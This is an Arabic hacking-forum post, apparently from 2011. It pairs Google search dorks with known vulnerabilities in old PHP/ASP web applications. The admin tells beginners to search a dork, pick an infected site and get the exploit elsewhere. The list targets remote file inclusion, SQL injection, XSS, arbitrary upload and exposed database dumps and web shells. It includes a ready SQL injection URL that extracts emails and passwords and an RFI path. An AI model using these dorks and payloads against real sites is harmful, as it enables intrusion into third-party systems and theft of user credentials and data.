بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile


تعليم اصول الهكر
 
الرئيسيةالبوابةالمنشوراتبحـثالأعضاءالتسجيلدخول

شاطر | 
 

 شرح اهم السكربتات مع الثغرات والدوركات

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin


avatar

عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
المزاج المزاج : Don't Play With Me

مُساهمةموضوع: شرح اهم السكربتات مع الثغرات والدوركات   الجمعة سبتمبر 09, 2011 4:49 pm



بسم الله الرحمن الرحيم


موضوعنا لليوم هو شرح اهم السكربتات مع الثغرات والدوركات



توضيح مفيد للمبتدئين
الشرح
خود الدروك وروح على
WWW.GOOGLE.COM
وسوي بحث
...

بعدين خترلك موقع مصاب
وروح على مواقع السيكرتي
والباقي عليك

Dork: inurl:"/chat/phpMyChat.php3"
Link: phpMyChat v0.14.5 Multiple Vulnerabilities
--------------------------------------------------------------------------------
Dork: "powered by talkback"
Author: civi
Link: TalkBack 2.2.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Total members:" AND "Paid out:" AND "Redeemed:"
Author: fuzion
Link: Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:Commence intitle:"Commence Conference System"
Author: fuzion
Link: IAPR COMMENCE 1.3 Multiple Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/hp/device/this.LCDispatcher"

--------------------------------------------------------------------------------
Dork: intitle:"Broadband Router Status"

--------------------------------------------------------------------------------
Dork: "Powered by SHP"
Author: civi
Link: Sciurus Hosting Panel Code Inject Exploit
--------------------------------------------------------------------------------
Dork: "Powered by icebb"
Author: civi
Link: IceBB 1.0-rc6 - Database Authentication Details Exploit
--------------------------------------------------------------------------------
Dork: "Powered by ExoPHPDesk v1.2.1"
Link: ExoPHPDesk Index.PHP Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by GuppY"
Link: GuppY Error.PHP Remote File Include and Command Execution Vulnerability
--------------------------------------------------------------------------------
Dork: "MySQL Administrator dump" filetype:sql

--------------------------------------------------------------------------------
Dork: intitle:"Helios Calendar Event Management System"
Author: Maximiliano Soler
Link: Helios Calendar <=1.2.1 Beta (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:Powered by UebiMiau! intitle:uebimiau inurl:/webmail/index.php?lid=
Author: Maximiliano Soler
Link: UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by MailBee WebMail"
Author: Maximiliano Soler
Link: MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by SocketKB version"
Author: Maximiliano Soler
Link: SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/info.php?reason=link" intitle:"BlaB!"
Author: Maximiliano Soler
Link: BlaB! Chat < 3.3 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"setup-config.php" intitle:"WordPress * Setup"

--------------------------------------------------------------------------------
Dork: intitle:"Micro Login System" inurl:login.php
Link: Micro Login System v1.0 Password Disclosure
--------------------------------------------------------------------------------
Dork: inurl:"efileman.cgi"
Link: eFileman Remote File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"MySQL-Dump" "Host: localhost" filetype:sql

--------------------------------------------------------------------------------
Dork: in****:"PostgreSQL database dump" filetype:sql

--------------------------------------------------------------------------------
Dork: in****:"phpBB Backup Script" filetype:sql

--------------------------------------------------------------------------------
Dork: in****:"phpMyAdmin MySQL-Dump" filetype:sql

--------------------------------------------------------------------------------
Dork: "Powered by ReloadCMS 1.2.5"
Link: ReloadCMS Index.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Index of" in****:"LiteSpeed Web Server at"
Link: LiteSpeed Remote Mime Type Injection
--------------------------------------------------------------------------------
Dork: intitle:"SiteBar" inurl:command
Link: SiteBar Command.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by rnote" inurl:"rnote.php"
Link: rNote rnote.PHP Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: CMS von artmedic webdesign
Author: iNs
Link: artmedic CMS Local File Inclusion
--------------------------------------------------------------------------------
Dork: com_wmtrssreader
Author: civi
Link: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: com_swmenufree
Author: civi
Link: Joomla! swMenuFree 4.6 Component Remote File Include
--------------------------------------------------------------------------------
Dork: com_mambocredits
Author: civi
Link: com_mambocredits Remote File Incluison
--------------------------------------------------------------------------------
Dork: "Powered by Tikiwiki"
Author: civi
Link: TikiWiki 1.9.8 Remote PHP Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by lightblog"
Author: civi
Link: LightBlog 8.4.1.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: "Powered by Cart32" inurl:cart32.exe -Demo
Link: Cart32 GetImage Arbitrary File Download Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by DRBGuestbook"
Link: DRBGuestbook Remote XSS Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by actsite"
Author: civi
Link: actSite v1.991 Beta (base.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by MDPro"
Link: MDPro 1.0.76 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by mxBB"
Link: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB" inurl:"faq.php?mode=openid"
2) "Powered by phpBB" openid
Author: salentinohack
Link: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork: "integramod nederland(s)"
Author: civi
Link: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by ActiveKB Knowledgebase Software"
Author: salentinohack
Link: ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Nuke-Evolution" intitle:NukeSentinel
2) inurl:/modules.php?name=NukeSentinel
Link: NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork:
1) "Powered by Xcms"
2) inurl:"/index.php?lng=it" "Amministrazione sito"
Link: XCMS Arbitrary Command Execution Vuln
--------------------------------------------------------------------------------
Dork: "Powered by phpBB XS" inurlrofile.php
Link: phpBB XS Profile.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by SimplePHPBlog"
Link: SimplePHPBlog img_upload_cgi.php Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by PhpWebGallery" inurlicture.php
Link: PhpWebGallery Picture.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Phormer"
Link: Phormer Index.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by iziContents"
Author: civi
Link: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB2 Plus"
2) inurl:"/phpBBplus/*.php" filetypehp
Link: phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork:
1) intitle:"styles demo" "Powered by phpBB"
2) inurl:/styles_demo/index.php
Link: StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
--------------------------------------------------------------------------------
Dork: in****:"R?is?vec KwsPHP"
Link: KwsPHP version 1.0 suffers from a remote SQL injection vulnerability the stats module.
--------------------------------------------------------------------------------
Dork: inurl:"/jblog/index.php"
Link: JBlog 1.0 (index.php id) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:"/webquest/soporte_derecha_w.php"
Link: PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by GForge"
Link: GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by TinyWebGallery"
Link: TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dorks: inurl:"/customer/product.php?" X-cart
Author: hip
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xcart/home.php
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dorks:
1) "Powered by phpmytourney"
2) inurlhpmytourney
3) inurl_signup.php
Author: civi
Link: phpMytourney (functions_file) Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"anyInventory 1.9" intitle:anyInventory
Link: AnyInventory => 1.9.1 Remote file inclusion
--------------------------------------------------------------------------------
Dork: intitle:"Calendar: A JSP APPLICATION"
Link: Apache Tomcat version 4.1.31 XSS Vuln.
--------------------------------------------------------------------------------
Dork: in****:" Powered by myBloggie"
Link: MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by Claroline * 2001"
Link: Claroline Local File Include and Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Webboard Powered by : 212cafe.com"
Link: 212cafe Webboard Read.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Weblogicnet"
Link: Weblogicnet (files_dir) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: inurl:index.php?option=com_content intitle:"Joomla* powered Site"
Link: Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:Tiki-Remind_Password.PHP
Link: Tikiwiki Tiki-Remind_Password.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:category.php?manufacturer_id=
Link: CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:/phpBB2/links.php OR inurl:/forum/links.php "Powered by phpBB"
Link: phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: in****:"Powered by DeskPRO" "Login / Create" OR "Login to Your Account"
Link: 1) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
Link: 2) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "Powered by xGB 2.0"
Link: xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:vwar/news.php
Author: civi
Link: VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by 'SunShop Shopping Cart'"
Link: SunShop v4.0 RC 6 (search) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: in****:"propuls?ar SPIP"
Link: SPIP Inc-Calcul.PHP3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Olate Download" inurl:download.php
2) intitle:"Olate Download - Error"
Link: Olate Download Download.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by LiteCommerce: ecommerce software"
Link: LiteCommerce Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Powered By phUploader"
Link: phUploader phUploader.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Squirrelcart * PHP Shopping Cart Software"
Link: Squirrelcart Popup_Window.PHP Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Dalai Forum v1*"
Link: Dalai Forum Forumreply.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by GetMyOwnArcade.com."
Link: GetMyOwnArcade Search.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by EZPhotoSales" intitle:"Online Viewing"
Link: EZPhotoSales Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by Article Dashboard"
Link: Article Dashboard Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by DeskPRO" inurl: login.php
Link: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/go/_files/?file="
Author: dun
Link: SOTEeSKLEP Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork:
1) in****:"Created by phpSysInfo" inurl: index.php
2) intitle:"System Information" in****:"Created by phpSysInfo"
Link: phpSysInfo Index.php Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/detail.asp?iPro" in****:"Year: *. Date:"
Link: AutoDealer Detail.ASP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intitle:"- LinPHA" inurl:new_images.php
2) in****:"Powered by LinPHA"
Link: LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection
--------------------------------------------------------------------------------
Dork:
1) in****:"Powered by Philboard" intitle:"Philboard"
2) inurlhilboard_forum.asp -sql
Link: Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql Injection
--------------------------------------------------------------------------------
Dork: intitle:xoops inurl:/modules/xfsection/
Author: civi
Link: XOOPS Module XFsection Remote File Inclusion
--------------------------------------------------------------------------------
Dork:
1) in****:"Powered by Nukedit"
2) "Powered by Nukedit" inurl:"login.asp"
Link: Nukedit Login.ASP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Built with FORMfields" inurl:/adMan/
Link: FORMfield Secure Login.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"The **** Ad Marketplace"
Link: AlstraSoft **** Ads Enterprise Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"powered by philboard" -SQL
Link: W1L3D4 Philboard v0.3 XSS Vulnerability
--------------------------------------------------------------------------------
Dork:
1) in****:"Powered by Webspell"
2) intitle:"webSPELL v4.0"
Link: Webspell 4.x Local File Inclusion (Win)
--------------------------------------------------------------------------------
Dork: intitle:"Confixx Professional" in****:Login"
Link: Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by UseBB"
Link: UseBB version: 1.0.7 Cross Site Scripting (XSS)
--------------------------------------------------------------------------------
Dork:
1) inurl:"us/index.php?option=com_remository
2) intitle:"* ReMOSitory"
Author: xdfsd45oi
Link: Mambo Remository Component <= 3.25 Remote Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered By Vivvo CMS"
Link: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: allinurl:bemarket
Author: mozi
RFI Exploit:
/bemarket/postscript/postscript.php?p_mode=evilscipt
--------------------------------------------------------------------------------
Dork: intitle:"dig up the stats"
Link: Traffic Stats SQL Injection Vulnerbility
--------------------------------------------------------------------------------
Dork:
1) inurlafiledb.php?action=search
2) in****:"Powered by paFileDB" intitleaFileDB
Link: paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: allinurl:directory.php?ax=list
Author: proxyakabran
SQL Injection:
/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D**, email,0x3a,password),6,7,8,9,10,0x22****212D2D,12, 13/**/from/**/links/*
--------------------------------------------------------------------------------
Dork: intitle:"SiteScape Forum Login"
Link: SiteScape Forum Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"mimic2.cgi"
Link: Mimicboard2 Mimic2.Dat Unauthorized Access Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by Calendar Express 2"
Link: Calendar Express Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by Discus" inurl:/discus/
Link: DiscusWare Discus Error Message Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by WebMatic" (only 99 results)
Link: Webmatic Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by MKPortal"
Link: MkPortal Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:mailmachine.cgi in****:"Mail Machine v3" (only 11 results)
Link: Mail Machine Local File Include Exploit
--------------------------------------------------------------------------------
Dork: inurlictionary.aspx intitleictionary.aspx
Link: HomestayFinder's Dictionary.aspx XSS vuln.
--------------------------------------------------------------------------------
Dork: ":80" ":8080" -in****:a* filetype:txt
Author: florence
Finds lists of proxies.
--------------------------------------------------------------------------------
Dork: intitle:"Aigaion * Please login" *(only 6 found)
Link: Aigaion <= 1.3.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:htmltonuke.php?
Link: PHP-Nuke RFI Exploit
--------------------------------------------------------------------------------
Dork: "Powered by PHP Director" inurl:videos.php
Link: PHP Director Videos.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpwcms ** web based content management system"
Link: PHPWCMS Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"powered by easybe." (only 6 results)
Link: Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"phpBook Ver" inurl:guestbook.php intitle:"Guestbook"
Link: NETonE PHPBook Guestbook.PHP Cross Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Login to Webmin" inurl:10000
Link: Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"spellcheck****.php" OR inurl:"spellcheckwindow.php" (only 10 results)
Link: SPHPell Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) inurl:index.php?name=PNphpBB2 inurl:viewforum
2) in****:"Powered by PNphpBB2"
Link: PNphpBB2 "viewforum.php" SQL Injection Blind Password Hash Fishing Exploit
--------------------------------------------------------------------------------
Dork: in****:"Powered by EQdkp" inurl:"login.php"
Link: EQDKP Login.PHP Arbitrary Variable Overwrite Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Wheatblog"
Link: Wheatblog Login SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpEventCalendar: Event Display"
Link: phpEventCalendar <= v0.2.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:forum.php "Powered by VBZooM"
Link: vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:c99shell filetypehp

--------------------------------------------------------------------------------
Dork: intitle:"WebChat" inurl:"/webchat/login.php
Link: WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"powered by e107" inurl:signup.php
Link: E107 Signup.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpTrafficA ** web statistics"
Link: phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Welcome to LMS" in****:"Please login"
Link: LMS - LAN Management System 1.9.6 - RFI
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Academic Suite"
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Learning System" inurl:/login/
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:"Powered by WMS-CMS" inurl:default.asp
Link: WMSCMS Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xmlrp.php in****:"Warning:" in****:"wp-config.php"
Link: Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: in****:"Software PBLang" inurl:"login.php "intitle:log in"
Link: PBLang <= 4.67.16.a Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: in****:Powered by EQdkp inurl:listmembers.php
Link: EQdkp <= 1.3.2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intitle:sendcard - a PHP postcard script using a database to store the cards"
Link: Sendcard <= 3.4.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: inurl:/cpCommerce/category.php
Link: cpCommerce <= 1.1.0 (category.php id_category) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: in****:"Powered by Particle Gallery"
Link: Particle Gallery Search.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Powered by Particle Blogger"
Link: Particle Blogger Archives.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: OTRS :: Login in****:"Powered by OTRS"
Link: OTRS Index.PL Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: in****:"Vistered Little Theme by"
Link: Vistered Little 1.6a Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork: in****:Powered by phpCodeur © 2002–2006 | Wanewsletter
Link: WAnewsletter-2.1.3 (newsletter.php) RFI Vul
--------------------------------------------------------------------------------
Dork: intitlehpPgAdmin - Login
Link: JavaScript code Injection in phpPgAdmin
--------------------------------------------------------------------------------
Dork: in****:SquirrelMail Login
Link: SquirrelMail Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: in****:Powered by Geeklog inurl:album.php
Link: Media Gallery =>v1.4 Remote file inclusion
--------------------------------------------------------------------------------
Dork: Powered By Pligg in****:Beta 9 / Login
Link: Pligg Reset Forgotten Password Security Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: mailto:*@aol.com
Helps find usernames on a certain domain, replace aol.com
--------------------------------------------------------------------------------
Dork: in****:GNUTURK PORTAL inurl:Mods.PHP
Link: GNUTurk Mods.PHP Cross Site Scripting Vulnerability



......





L10q@hotmail.com

fuad4me@gmail.com


[size=24]للشكاوي   و الاقتراحات 

[/size]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://mr11-11mr.7olm.org
 
شرح اهم السكربتات مع الثغرات والدوركات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بدايه تعلم الهكر من الصفر الى الاحتراف :: قسم الثغرات-
انتقل الى: